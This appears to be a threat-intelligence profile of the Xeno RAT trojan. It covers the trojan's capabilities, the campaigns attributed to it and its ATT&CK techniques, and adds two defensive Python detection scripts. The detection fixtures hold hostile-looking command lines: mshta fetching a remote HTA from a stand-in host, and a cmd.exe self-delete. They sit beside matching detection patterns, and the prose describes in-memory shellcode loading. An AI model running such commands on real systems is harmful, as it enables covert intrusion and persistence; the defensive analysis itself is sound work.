Xeno RAT
Xeno RAT is an open-source Windows remote access trojan written in C# and publicly available on GitHub. It is described as compatible with Windows 10 and Windows 11 and includes a builder for creating customized variants. Reported capabilities include remote command execution, data exfiltration/theft, file operations, loading and executing external DLL modules, keystroke logging, screenshot capture, clipboard monitoring, webcam and microphone access including live audio recording, antivirus information retrieval, SOCKS5 reverse proxy/network tunneling, hVNC hidden desktop functionality, persistence creation including scheduled tasks, and self-removal/uninstall features.
The malware has been observed in multiple intrusion sets and delivery chains. Seqrite reported a spear-phishing campaign dubbed Operation XENOFISCAL, likely conducted by the Pakistan-aligned SideCopy group (associated with Transparent Tribe/APT36), targeting Afghanistan’s Ministry of Finance and provincial finance/revenue entities. In that activity, phishing emails delivered ZIP archives containing Pashto-language malicious LNK files disguised as PDFs; execution invoked mshta.exe to fetch an HTA payload from a compromised Afghan domain, execute obfuscated JavaScript, establish registry persistence masquerading as Microsoft Edge, and deploy Xeno RAT 1.8.7 via a DLL loader alongside a decoy document. Seqrite described the campaign sample as a customized Xeno RAT with a hardcoded C2 domain hosted by a bulletproof provider in Bulgaria.
Xeno RAT has also been linked in reporting on DPRK-related activity. Fortinet noted earlier iterations of a Kimsuky-attributed campaign used LNK files and GitHub-based command-and-control to distribute Xeno RAT and its variant MoonPeak, consistent with prior ENKI and Trellix reporting. Separate reporting described Kimsuky targeting diplomatic missions in South Korea using phishing emails with ZIP/LNK payloads, GitHub for covert C2, and cloud services such as Dropbox and Daum Cloud to deliver the Xeno RAT variant MoonPeak.
Other observed delivery mechanisms include Discord CDN distribution via a shortcut file disguised as a WhatsApp screenshot that downloads a ZIP archive and proceeds through a multi-stage infection chain using DLL side-loading, persistence, and anti-analysis/anti-detection measures. Securonix also reported Xeno RAT as one of several payloads in the VOID#GEIST campaign, where phishing-delivered batch scripts fetched staged payloads from TryCloudflare infrastructure; a Python loader and the legitimate Microsoft binary AppInstallerPythonRedirector.exe were used to decrypt and launch Xeno RAT, with in-memory execution via injection into explorer.exe. Proofpoint additionally listed Xeno RAT among payloads historically used by the initial access broker TA584.
Cybereason highlighted Xeno RAT’s built-in hVNC capability as a standard feature and observed in testing that attackers could launch hidden Chrome and PowerShell sessions invisible to the victim, with a second explorer.exe associated with the hidden desktop. High-confidence associations in the reporting summarized here therefore include use by SideCopy against Afghan government finance targets, prior use/distribution in Kimsuky-linked GitHub-C2 activity, and broader use as a commodity/open-source RAT in phishing-led campaigns.
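The hVNC observation above gives a concrete host-side signal: a second explorer.exe in a session that already has its interactive shell, with its own child processes. The following is an added example written for this page, not Xeno RAT code and not Cybereason's tooling; it walks a constructed process snapshot (pid, parent pid, image name, session id, user, the fields any process listing provides) and reports every explorer.exe in a multi-shell session that was not started by userinit.exe, together with its parent and children. The process names and pids in the snapshot, including the implant stand-in update_helper.exe, are invented.

```python
"""Flag the hidden-desktop (hVNC) shape: a second explorer.exe inside an
interactive session, carrying its own child processes.

Added example for this page, not Xeno RAT code and not Cybereason's tooling.
The snapshot below is constructed; on a live host the same fields come from
a process listing (pid, parent pid, image name, session id, user).
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    session: int
    user: str


# Constructed snapshot. Session 1: alice's real shell (explorer.exe spawned by
# userinit.exe), an Outlook process, a stand-in for the implant
# (update_helper.exe, an invented name) and the second explorer.exe it
# started, which hosts a browser and PowerShell on the hidden desktop.
# Session 2: bob's ordinary logon with a single explorer.exe.
SNAPSHOT = [
    Proc(500, 4, "winlogon.exe", 1, "NT AUTHORITY\\SYSTEM"),
    Proc(612, 500, "userinit.exe", 1, "CORP\\alice"),
    Proc(700, 612, "explorer.exe", 1, "CORP\\alice"),
    Proc(1804, 700, "outlook.exe", 1, "CORP\\alice"),
    Proc(2210, 1804, "update_helper.exe", 1, "CORP\\alice"),
    Proc(2300, 2210, "explorer.exe", 1, "CORP\\alice"),
    Proc(2410, 2300, "chrome.exe", 1, "CORP\\alice"),
    Proc(2450, 2300, "powershell.exe", 1, "CORP\\alice"),
    Proc(800, 4, "winlogon.exe", 2, "NT AUTHORITY\\SYSTEM"),
    Proc(812, 800, "userinit.exe", 2, "CORP\\bob"),
    Proc(900, 812, "explorer.exe", 2, "CORP\\bob"),
]


def _children(procs, pid):
    """Image names of the direct children of pid, sorted for stable output."""
    return sorted(p.name for p in procs if p.ppid == pid)


def find_hidden_desktops(procs):
    """Return one finding per extra explorer.exe in a session that has more
    than one shell. The shell spawned by userinit.exe is the interactive
    desktop's own and is never reported; everything else is a triage lead
    that carries its parent and children for the analyst."""
    by_pid = {p.pid: p for p in procs}
    shells_per_session = defaultdict(list)
    for p in procs:
        if p.name.lower() == "explorer.exe":
            shells_per_session[p.session].append(p)

    findings = []
    for session, shells in sorted(shells_per_session.items()):
        if len(shells) < 2:
            continue  # a single shell per session is the normal case
        for shell in shells:
            parent = by_pid.get(shell.ppid)
            if parent is not None and parent.name.lower() == "userinit.exe":
                continue
            findings.append({
                "session": session,
                "user": shell.user,
                "pid": shell.pid,
                "parent": parent.name if parent is not None else None,
                "children": _children(procs, shell.pid),
            })
    return findings


if __name__ == "__main__":
    for f in find_hidden_desktops(SNAPSHOT):
        print(f"session {f['session']} ({f['user']}): extra explorer.exe pid "
              f"{f['pid']} started by {f['parent']}, children {f['children']}")
```

An extra explorer.exe also appears when a user restarts the shell from Task Manager or has "Launch folder windows in a separate process" enabled, so the finding is a lead rather than a verdict; the parent image and the child list (here a browser and PowerShell under a shell that userinit.exe did not start) are what separate the hidden-desktop case from those.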
Groups observed using it
5 distinct threat actors attributed by public researchers.
The malware these steps were in service of, Xeno RAT, is an open source (OSS) remote stealer, customized in this case with a hardcoded command-and-control (C2) domain hosted by a bulletproof service in Bulgaria.
Fortinet notes that earlier iterations of this activity delivered the Xeno RAT malware family. Similar GitHub-based C2 usage for distributing Xeno RAT and its variant MoonPeak was previously reported by ENKI and Trellix, both attributing the activity to Kimsuky.
Proofpoint says TA584 has used a large number of payloads over the years, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, and DCRAT.
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
the attackers hosted their remote payload on a compromised domain in the IP address space of Afghanistan's Ministry of Communication and Information Technology.
Initial Access
1 technique
The attacks began with spear-phishing emails. Those emails contained zip archives, with malicious LNK files disguised as PDFs.
Execution
6 techniques
The malware is equipped to ... launch the malware via a scheduled task ...
Xeno RAT is capable of remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture.
The RunProcessWithHiddenCmd() function is used to execute files or commands through cmd.exe.
Upon execution, the LNK file uses mshta.exe to download a remote HTML Application (HTA) from a compromised Afghan education domain, leading to the execution of obfuscated JavaScript.
the malware directly allocates executable memory within the current process using the Windows API VirtualAlloc()... transfers execution to the injected buffer through the CreateThread() API.
Those emails contained zip archives, with malicious LNK files disguised as PDFs.
Persistence
2 techniques
The malware is equipped to ... launch the malware via a scheduled task ...
Privilege Escalation
3 techniques
The malware is equipped to ... launch the malware via a scheduled task ...
the malware directly allocates executable memory within the current process using the Windows API VirtualAlloc()... copies the reconstructed shellcode buffer into the allocated region... and transfers execution to the injected buffer through the CreateThread() API.
Stealth
7 techniques
This staged approach is commonly used in fileless malware... reconstruct the serialized payload entirely in memory without touching disk.
A couple of loaders followed, and the attackers established persistence via the Windows registry, disguising their task as a Microsoft Edge process.
the malware directly allocates executable memory within the current process using the Windows API VirtualAlloc()... copies the reconstructed shellcode buffer into the allocated region... and transfers execution to the injected buffer through the CreateThread() API.
It launches a hidden cmd.exe process with a Base64-decoded command (/C choice /C Y /N /D Y /T 3 & Del) that waits for a few seconds and then deletes the running executable file from disk.
The LNK files used mshta to fetch an HTA payload, which then got decoded in-memory.
The malware creates a directory named USOShared-1de48789-1285 under C:\Users\Public\ to store the next-stage HTA payload... The directory naming convention mimics application-generated cache or profile folders.
The embedded payload is then decrypted and loaded directly from memory using reflective techniques such as Assembly.Load(byte[]), avoiding disk-based deployment entirely.
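The Execution and Stealth evidence above describes a chain that leaves distinct host artifacts: mshta.exe launched with a remote URL, a cmd.exe self-delete built on choice /C Y /N /D Y /T 3 & Del, a staging directory under C:\Users\Public named like USOShared-1de48789-1285, and registry persistence posing as Microsoft Edge. The following is an added example written for this page, not code from Xeno RAT or from any of the vendors cited; it runs four checks over constructed, Sysmon-shaped events (field names follow Sysmon Event ID 1 process creation and Event ID 13 registry value set). The hosts, file names and SIDs are invented, and the assumption that the Edge masquerade lives in a Run key is mine: the reporting says only that the registry entry was disguised as an Edge process.

```python
"""Triage rules for the staging chain quoted on this page, over constructed
Sysmon-shaped events. Added example, not vendor or Xeno RAT code.

Assumptions: events are dicts with Sysmon field names; the Edge masquerade
is modelled as a Run-key value (the reporting does not name the key)."""
import re

# Known Edge install locations. A Run value that claims to be Edge but points
# elsewhere is the masquerade worth a look.
EDGE_PATHS = re.compile(r"\\Microsoft\\Edge(Update)?\\", re.IGNORECASE)
RUN_KEY = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\(?P<value>[^\\]+)$",
    re.IGNORECASE)
# USOShared-<hex>-<digits> under the Public profile, the naming seen in the
# Seqrite chain.
STAGING_DIR = re.compile(r"C:\\Users\\Public\\USOShared-[0-9a-f]+-\d+", re.IGNORECASE)
# The self-delete idiom: wait on choice(1), then delete the running binary.
SELF_DELETE = re.compile(r"choice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+\d+\s*&\s*del\b", re.IGNORECASE)
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)

# Constructed events. 0-2 reproduce the chain; 3-5 are benign look-alikes.
EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://staging.example.invalid/cache/index.hta"},
    {"id": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\Public\USOShared-1de48789-1285\svc.exe",
     "CommandLine": r'cmd.exe /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Public\USOShared-1de48789-1285\svc.exe"'},
    {"id": 13, "Image": r"C:\Users\Public\USOShared-1de48789-1285\svc.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpdate",
     "Details": r"C:\Users\Public\USOShared-1de48789-1285\svc.exe"},
    {"id": 13, "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_A1B2",
     "Details": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'},
    {"id": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Tools\inventory.hta"},
    {"id": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /C dir C:\Users\Public"},
]


def _is_image(event, name):
    return event.get("Image", "").lower().endswith("\\" + name)


def mshta_remote_hta(e):
    """mshta.exe handed a URL rather than a local .hta."""
    return e["id"] == 1 and _is_image(e, "mshta.exe") \
        and REMOTE_URL.search(e.get("CommandLine", "")) is not None


def cmd_self_delete(e):
    """cmd.exe running the choice-then-Del self-removal idiom."""
    return e["id"] == 1 and _is_image(e, "cmd.exe") \
        and SELF_DELETE.search(e.get("CommandLine", "")) is not None


def public_staging_dir(e):
    """Any field referencing a USOShared-* directory under C:\\Users\\Public."""
    fields = (e.get("Image", ""), e.get("ParentImage", ""), e.get("CommandLine", ""),
              e.get("TargetObject", ""), e.get("Details", ""))
    return any(STAGING_DIR.search(f) for f in fields)


def edge_masquerade_run_key(e):
    """Run value named like Edge whose data is outside Edge's install paths."""
    if e["id"] != 13:
        return False
    m = RUN_KEY.search(e.get("TargetObject", ""))
    if m is None or "edge" not in m.group("value").lower():
        return False
    return EDGE_PATHS.search(e.get("Details", "")) is None


RULES = [
    ("mshta_remote_hta", mshta_remote_hta),
    ("cmd_self_delete", cmd_self_delete),
    ("public_staging_dir", public_staging_dir),
    ("edge_masquerade_run_key", edge_masquerade_run_key),
]


def triage(events):
    """Return (rule name, event index) for every rule that fires."""
    return [(name, idx) for idx, e in enumerate(events)
            for name, pred in RULES if pred(e)]


if __name__ == "__main__":
    for name, idx in triage(EVENTS):
        print(f"{name}: event {idx}")
```

Events 3 to 5 show the false-positive boundary each rule respects: Edge's own AutoLaunch Run value points under \Microsoft\Edge\ and is left alone, mshta.exe opening a local .hta is not a remote fetch, and a plain cmd.exe directory listing does not carry the choice-then-Del sequence.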
Credential Access
1 technique
Discovery
2 techniques
The script then checks whether the .NET Framework version v4.0.30319 is installed by querying the registry path HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319.
GetAntivirus function retrieves antivirus information from the system using Windows Management Instrumentation (WMI) by querying the AntivirusProduct class under root\SecurityCenter2.
Collection
5 techniques
Xeno RAT is capable of remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture.
The malware is equipped to ... monitor the clipboard ...
The malware is equipped to ... track webcam/microphone ...
Command and Control
6 techniques
Xeno RAT, is an open source (OSS) remote stealer, customized in this case with a hardcoded command-and-control (C2) domain hosted by a bulletproof service in Bulgaria.
the LNK silently leverages mshta.exe to fetch a remote HTA payload from a compromised Afghan education domain... hosted over HTTPS.
Xeno RAT is capable of remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture.
The malware is equipped to ... support SOCKS5 proxy-based network tunneling ...
data security is enforced using AES encryption, where raw data is encrypted with a shared key and fixed IV via CryptoStream, ensuring secure communication during transmission.
By running their malicious traffic through the government's own sovereign infrastructure, on a website situated next to more than 200 legitimate government and education sites, the hackers were able to blend their malicious traffic with proper state business.
Other
1 technique
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups.
Other indicator types observed in public reporting.
Recent activity
21 sources tracked across advisories, community write-ups, and news.
An open-source remote access trojan and stealer used in this campaign for espionage, customized with a hardcoded C2 domain.
Related: Pakistan Spies on Afghan Finance Ministry With Xeno RAT
Open-source remote access trojan used in a spear-phishing campaign. It enables remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture.
An open-source remote access trojan used in spear-phishing campaigns. In this campaign it was dropped via a DLL-based loader and established registry-based persistence while enabling remote command handling, DLL module execution, scheduled task launch, antivirus discovery, SOCKS5 tunneling, file operations, keylogging, screenshots, clipboard monitoring, webcam/microphone tracking, persistence removal, and self-uninstall.